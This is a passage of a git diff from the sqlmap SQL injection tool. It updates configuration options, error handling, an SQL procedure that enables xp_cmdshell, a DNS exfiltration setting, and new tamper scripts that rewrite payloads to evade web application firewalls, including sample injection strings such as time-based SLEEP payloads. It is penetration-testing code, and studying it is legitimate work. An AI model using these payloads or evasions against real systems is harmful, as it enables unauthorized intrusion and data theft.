rootQuery.blind.query % (user, index) @@ -525,8 +538,8 @@ class Users: # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: @@ -545,12 +558,12 @@ class Users: # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.upper() == "Y": + if priv.upper() == 'Y': for position, mysqlPriv in MYSQL_PRIVS.items(): if position == i: privileges.add(mysqlPriv) @@ -561,17 +574,21 @@ class Users: elif Backend.isDbms(DBMS.FIREBIRD): privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + # In Informix we get one letter for the highest privilege + elif Backend.isDbms(DBMS.INFORMIX): + privileges.add(INFORMIX_PRIVS[privilege.strip()]) + # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] privs = privs[1] privs = list(privs.strip()) i = 1 for priv in privs: - if priv.upper() in ("Y", "G"): + if priv.upper() in ('Y', 'G'): for position, db2Priv in DB2_PRIVS.items(): if position == i: privilege += ", " + db2Priv diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/procs/mssqlserver/configure_xp_cmdshell.sql index 349c8cf8c..e23e4b06a 100644 --- a/procs/mssqlserver/configure_xp_cmdshell.sql +++ b/procs/mssqlserver/configure_xp_cmdshell.sql @@ -2,5 +2,5 @@ EXEC master..sp_configure 'show advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; RECONFIGURE WITH OVERRIDE; -EXEC sp_configure 'show advanced options',0; +EXEC master..sp_configure 'show advanced options',0; RECONFIGURE WITH OVERRIDE diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..6724af223 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ diff --git a/sqlmap.conf b/sqlmap.conf index d7db6c376..9386ace16 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -93,10 +93,26 @@ authType = # Syntax: username:password authCred = -# HTTP Authentication PEM private key. Useful only if the target URL requires +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires # PKI authentication and you have such data. # Syntax: key_file -authPrivate = +authFile = + +# Ignore HTTP Error 401 (Unauthorized). +# Valid: True or False +ignore401 = False + +# Ignore system default proxy settings. +# Valid: True or False +ignoreProxy = False + +# Ignore redirection attempts. +# Valid: True or False +ignoreRedirects = False + +# Ignore connection timeouts. +# Valid: True or False +ignoreTimeouts = False # Use a proxy to connect to the target URL. # Syntax: (http|https|socks4|socks5)://address:port @@ -110,10 +126,6 @@ proxyCred = # Load proxy list from a file proxyFile = -# Ignore system default proxy settings. 
-# Valid: True or False -ignoreProxy = False - # Use Tor anonymity network. # Valid: True or False tor = False @@ -124,7 +136,7 @@ tor = False # Set Tor proxy type. # Valid: HTTP, SOCKS4, SOCKS5 -torType = HTTP +torType = SOCKS5 # Check to see if Tor is used properly. # Valid: True or False @@ -222,10 +234,13 @@ testParameter = # Skip testing for given parameter(s). skip = -# Skip testing parameters that not appear dynamic. +# Skip testing parameters that not appear to be dynamic. # Valid: True or False skipStatic = False +# Regexp to exclude parameters from testing (e.g. "ses"). +paramExclude = + # Force back-end DBMS to this value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. @@ -369,7 +384,7 @@ uFrom = # Domain name used for DNS exfiltration attack # Valid: string -dnsName = +dnsDomain = # Resulting page URL searched for second-order response # Valid: string @@ -482,6 +497,9 @@ col = # Back-end database management system database table column(s) to not enumerate. excludeCol = +# Pivot column name. +pivotColumn = + # Use WHERE condition while table dumping (e.g. "id=1"). dumpWhere = @@ -494,13 +512,13 @@ excludeSysDbs = False # First query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will start to retrieve the query output entries from -# the first) +# Default: 0 (sqlmap will start to retrieve the table dump entries from +# first one) limitStart = 0 # Last query output entry to retrieve # Valid: integer -# Default: 0 (sqlmap will detect the number of query output entries and +# Default: 0 (sqlmap will detect the number of table dump entries and # retrieve them until the last) limitStop = 0 @@ -650,9 +668,15 @@ trafficFile = # Valid: True or False batch = False +# Result fields having binary values (e.g. "digest"). +binaryFields = + # Force character encoding used for data retrieval. charset = +# Check Internet connection before assessing the target. +checkInternet = False + # Crawl the website starting from the target URL. # Valid: integer # Default: 0 @@ -697,9 +721,6 @@ outputDir = # Valid: True or False parseErrors = False -# Pivot column name. -pivotColumn = - # Regular expression for filtering targets from provided Burp. # or WebScarab proxy log. # Example: (google|yahoo) @@ -708,6 +729,9 @@ scope = # Select tests by payloads and/or titles (e.g. ROW) testFilter = +# Skip tests by payloads and/or titles (e.g. BENCHMARK) +testSkip = + # Update sqlmap. # Valid: True or False updateAll = False @@ -758,14 +782,20 @@ mobile = False # Valid: True or False offline = False -# Display page rank (PR) for Google dork results. +# Skip heuristic detection of WAF/IPS/IDS protection. # Valid: True or False -pageRank = False +skipWaf = False # Conduct thorough tests only if positive heuristic(s). # Valid: True or False smart = False +# Local directory for storing temporary files. +tmpDir = + +# Web server document root directory (e.g. "/var/www"). +webRoot = + # Simple wizard interface for beginner users. 
# Valid: True or False wizard = False diff --git a/sqlmap.py b/sqlmap.py index 6bb12a56f..5d859f611 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -1,17 +1,28 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import + import bdb +import distutils +import glob import inspect +import json import logging import os import re import shutil import sys +import thread +import threading import time import traceback import warnings @@ -19,35 +30,46 @@ import warnings warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) warnings.filterwarnings(action="ignore", category=DeprecationWarning) -from lib.utils import versioncheck # this has to be the first non-standard import - -from lib.controller.controller import start -from lib.core.common import banner -from lib.core.common import createGithubIssue -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import maskSensitiveData -from lib.core.common import setPaths -from lib.core.common import weAreFrozen -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import kb from lib.core.data import logger -from lib.core.data import paths -from lib.core.common import unhandledExceptionMessage -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import initOptions -from lib.core.option import init -from lib.core.profiling import profile -from lib.core.settings import LEGAL_DISCLAIMER -from lib.core.testing import smokeTest -from lib.core.testing import liveTest -from lib.parse.cmdline import cmdLineParser -from lib.utils.api import setRestAPILog -from lib.utils.api import StdDbOut + +try: + from lib.controller.controller import start + from lib.core.common import banner + from lib.core.common import checkIntegrity + from lib.core.common import createGithubIssue + from lib.core.common import dataToStdout + from lib.core.common import getSafeExString + from lib.core.common import getUnicode + from lib.core.common import maskSensitiveData + from lib.core.common import openFile + from lib.core.common import setPaths + from lib.core.common import weAreFrozen + from lib.core.data import cmdLineOptions + from lib.core.data import conf + from lib.core.data import kb + from lib.core.common import unhandledExceptionMessage + from lib.core.common import MKSTEMP_PREFIX + from lib.core.exception import SqlmapBaseException + from lib.core.exception import SqlmapShellQuitException + from lib.core.exception import SqlmapSilentQuitException + from lib.core.exception import SqlmapUserQuitException + from lib.core.option import initOptions + from lib.core.option import init + from lib.core.profiling import profile + from lib.core.settings import GIT_PAGE + from lib.core.settings import IS_WIN + from lib.core.settings import LEGAL_DISCLAIMER + from lib.core.settings import THREAD_FINALIZATION_TIMEOUT + from lib.core.settings import UNICODE_ENCODING + from lib.core.settings import VERSION + from lib.core.testing import smokeTest + from lib.core.testing import liveTest + from 
lib.parse.cmdline import cmdLineParser +except KeyboardInterrupt: + errMsg = "user aborted" + logger.error(errMsg) + + raise SystemExit def modulePath(): """ @@ -60,7 +82,33 @@ def modulePath(): except NameError: _ = inspect.getsourcefile(modulePath) - return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding()) + return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) + +def checkEnvironment(): + try: + os.path.isdir(modulePath()) + except UnicodeEncodeError: + errMsg = "your system does not properly handle non-ASCII paths. " + errMsg += "Please move the sqlmap's directory to the other location" + logger.critical(errMsg) + raise SystemExit + + if distutils.version.LooseVersion(VERSION) < distutils.version.LooseVersion("1.0"): + errMsg = "your runtime environment (e.g. PYTHONPATH) is " + errMsg += "broken. Please make sure that you are not running " + errMsg += "newer versions of sqlmap with runtime scripts for older " + errMsg += "versions" + logger.critical(errMsg) + raise SystemExit + + # Patch for pip (import) environment + if "sqlmap.sqlmap" in sys.modules: + for _ in ("cmdLineOptions", "conf", "kb"): + globals()[_] = getattr(sys.modules["lib.core.data"], _) + + for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"): + globals()[_] = getattr(sys.modules["lib.core.exception"], _) + def main(): """ @@ -68,31 +116,25 @@ def main(): """ try: - paths.SQLMAP_ROOT_PATH = modulePath() - - try: - os.path.isdir(paths.SQLMAP_ROOT_PATH) - except UnicodeEncodeError: - errMsg = "your system does not properly handle non-ASCII paths. " - errMsg += "Please move the sqlmap's directory to the other location" - logger.error(errMsg) - exit() - - setPaths() + checkEnvironment() + setPaths(modulePath()) + banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) - if hasattr(conf, "api"): + if conf.get("api"): + # heavy imports + from lib.utils.api import StdDbOut + from lib.utils.api import setRestAPILog + # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() - banner() - conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) @@ -106,11 +148,22 @@ def main(): elif conf.liveTest: liveTest() else: - start() + try: + start() + except thread.error as ex: + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. 
Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise except SqlmapUserQuitException: errMsg = "user quit" - logger.error(errMsg) + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass @@ -119,19 +172,30 @@ def main(): cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: - errMsg = getUnicode(ex.message) - logger.critical(errMsg) - sys.exit(1) + errMsg = getSafeExString(ex) + try: + logger.critical(errMsg) + except KeyboardInterrupt: + pass + raise SystemExit except KeyboardInterrupt: print + errMsg = "user aborted" - logger.error(errMsg) + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except EOFError: print errMsg = "exit" - logger.error(errMsg) + + try: + logger.error(errMsg) + except KeyboardInterrupt: + pass except SystemExit: pass @@ -140,56 +204,161 @@ def main(): print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() + valid = checkIntegrity() - for match in re.finditer(r'File "(.+?)", line', excMsg): - file_ = match.group(1) - file_ = os.path.relpath(file_, os.path.dirname(__file__)) - file_ = file_.replace("\\", '/') - file_ = re.sub(r"\.\./", '/', file_).lstrip('/') - excMsg = excMsg.replace(match.group(1), file_) + try: + if valid is False: + errMsg = "code integrity check failed (turning off automatic issue creation). " + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit - errMsg = maskSensitiveData(errMsg) - excMsg = maskSensitiveData(excMsg) + elif "tamper/" in excMsg: + logger.critical(errMsg) + print + dataToStdout(excMsg) + raise SystemExit - logger.critical(errMsg) - kb.stickyLevel = logging.CRITICAL - dataToStdout(excMsg) - createGithubIssue(errMsg, excMsg) + elif "MemoryError" in excMsg: + errMsg = "memory exhaustion detected" + logger.error(errMsg) + raise SystemExit + + elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): + errMsg = "no space left on output device" + logger.error(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): + errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] + errMsg += "You should retrieve the latest development version from official GitHub " + errMsg += "repository at '%s'" % GIT_PAGE + logger.error(errMsg) + raise SystemExit + + elif "Read-only file system" in excMsg: + errMsg = "output device is mounted as read-only" + logger.error(errMsg) + raise SystemExit + + elif "OperationalError: disk I/O error" in excMsg: + errMsg = "I/O error on output device" + logger.error(errMsg) + raise SystemExit + + elif "_mkstemp_inner" in excMsg: + errMsg = "there has been a problem while accessing temporary files" + logger.error(errMsg) + raise SystemExit + + elif "can't start new thread" in excMsg: + errMsg = "there has been a problem while creating new thread instance. " + errMsg += "Please make sure that you are not running too many processes" + if not IS_WIN: + errMsg += " (or increase the 'ulimit -u' value)" + logger.error(errMsg) + raise SystemExit + + elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): + errMsg = "there has been a problem in enumeration. 
" + errMsg += "Because of a considerable chance of false-positive case " + errMsg += "you are advised to rerun with switch '--flush-session'" + logger.error(errMsg) + raise SystemExit + + elif all(_ in excMsg for _ in ("pymysql", "configparser")): + errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" + logger.error(errMsg) + raise SystemExit + + elif "bad marshal data (unknown type code)" in excMsg: + match = re.search(r"\s*(.+)\s+ValueError", excMsg) + errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") + errMsg += ". Please delete .pyc files on your system to fix the problem" + logger.error(errMsg) + raise SystemExit + + elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): + raise SystemExit + + for match in re.finditer(r'File "(.+?)", line', excMsg): + file_ = match.group(1) + file_ = os.path.relpath(file_, os.path.dirname(__file__)) + file_ = file_.replace("\\", '/') + file_ = re.sub(r"\.\./", '/', file_).lstrip('/') + excMsg = excMsg.replace(match.group(1), file_) + + errMsg = maskSensitiveData(errMsg) + excMsg = maskSensitiveData(excMsg) + + if conf.get("api") or not valid: + logger.critical("%s\n%s" % (errMsg, excMsg)) + else: + logger.critical(errMsg) + kb.stickyLevel = logging.CRITICAL + dataToStdout(excMsg) + createGithubIssue(errMsg, excMsg) + + except KeyboardInterrupt: + pass finally: + kb.threadContinue = False + if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) - if kb.get("tempDir"): - shutil.rmtree(kb.tempDir, ignore_errors=True) - - kb.threadContinue = False kb.threadException = True + if kb.get("tempDir"): + for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): + for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): + try: + os.remove(filepath) + except OSError: + pass + if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): + shutil.rmtree(kb.tempDir, ignore_errors=True) + if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass + if conf.harFile: + with openFile(conf.harFile, "w+b") as f: + f.write(json.dumps(conf.httpCollector.obtain(), indent=4, separators=(',', ': '))) + if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() - if hasattr(conf, "api"): + if conf.get("api"): try: - conf.database_cursor.disconnect() + conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() - # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program - if conf.get("threads", 0) > 1 or conf.get("dnsServer"): - os._exit(0) + # short delay for thread finalization + try: + _ = time.time() + while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: + time.sleep(0.01) + except KeyboardInterrupt: + pass + finally: + # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program + if threading.activeCount() > 1: + os._exit(0) if __name__ == "__main__": main() diff --git a/sqlmapapi.py b/sqlmapapi.py index 03a2807e7..09c1a9340 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -1,46 +1,54 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' 
for copying permission """ import logging import optparse +import sys + +sys.dont_write_bytecode = True + +__import__("lib.utils.versioncheck") # this has to be the first non-standard import from sqlmap import modulePath from lib.core.common import setPaths -from lib.core.data import paths from lib.core.data import logger +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.utils.api import client from lib.utils.api import server -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 - -if __name__ == "__main__": +def main(): """ REST-JSON API main function """ + # Set default logging level to debug logger.setLevel(logging.DEBUG) - # Initialize path variable - paths.SQLMAP_ROOT_PATH = modulePath() - setPaths() + # Initialize paths + setPaths(modulePath()) # Parse command line options apiparser = optparse.OptionParser() - apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") - apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") - apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") + apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_DEFAULT_PORT, action="store_true") + apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store") + apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store") + apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store") (args, _) = apiparser.parse_args() # Start the client or the server if args.server is True: - server(args.host, args.port) + server(args.host, args.port, adapter=args.adapter) elif args.client is True: client(args.host, args.port) else: apiparser.print_help() + +if __name__ == "__main__": + main() diff --git a/tamper/__init__.py b/tamper/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/tamper/__init__.py +++ b/tamper/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index 78c17f328..7504f0c48 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 6b0930679..cd2a4d115 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 
sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index faae3a2e4..b727af909 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/base64encode.py b/tamper/base64encode.py index cda5619dd..c6b460b91 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/between.py b/tamper/between.py index f7331bd9f..26358fa86 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index a26cdadf7..7e971b1f5 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 3b6a5301f..93623eeba 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/charencode.py b/tamper/charencode.py index 9df3e9624..ee2339e72 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index 09e602957..d578439e5 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py new file mode 100644 index 000000000..a88fefedb --- /dev/null +++ b/tamper/commalesslimit.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' + """ + + retVal = payload + + match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") + 
if match: + retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) + + return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py new file mode 100644 index 000000000..caebbc190 --- /dev/null +++ b/tamper/commalessmid.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' + """ + + retVal = payload + + warnMsg = "you should consider usage of switch '--no-cast' along with " + warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] + singleTimeWarnMessage(warnMsg) + + match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) + + return retVal diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py new file mode 100644 index 000000000..59185002a --- /dev/null +++ b/tamper/commentbeforeparentheses.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Prepends (inline) comment before parentheses + + Tested against: + * Microsoft SQL Server + * MySQL + * Oracle + * PostgreSQL + + Notes: + * Useful to bypass web application firewalls that block usage + of function calls + + >>> tamper('SELECT ABS(1)') + 'SELECT ABS/**/(1)' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\b(\w+)\(", "\g<1>/**/(", retVal) + + return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index 5182bd8d5..92404a060 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index d9ccf0082..1aa5a47a3 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -35,15 +35,9 @@ def tamper(payload, **kwargs): 'SELECT * FROM users WHERE id LIKE 1' """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word - retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py new file mode 100644 index 000000000..6b5dd5134 --- /dev/null +++ b/tamper/escapequotes.py @@ -0,0 +1,23 @@ 
+#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Slash escape quotes (' and ") + + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + + return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py index a1c3f8df3..012cc6771 100644 --- a/tamper/greatest.py +++ b/tamper/greatest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index c0d0eea5c..ef9c4ff61 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py new file mode 100644 index 000000000..d30d11884 --- /dev/null +++ b/tamper/htmlencode.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode (using code points) all non-alphanumeric characters + + >>> tamper("1' AND SLEEP(5)#") + '1&#39; AND 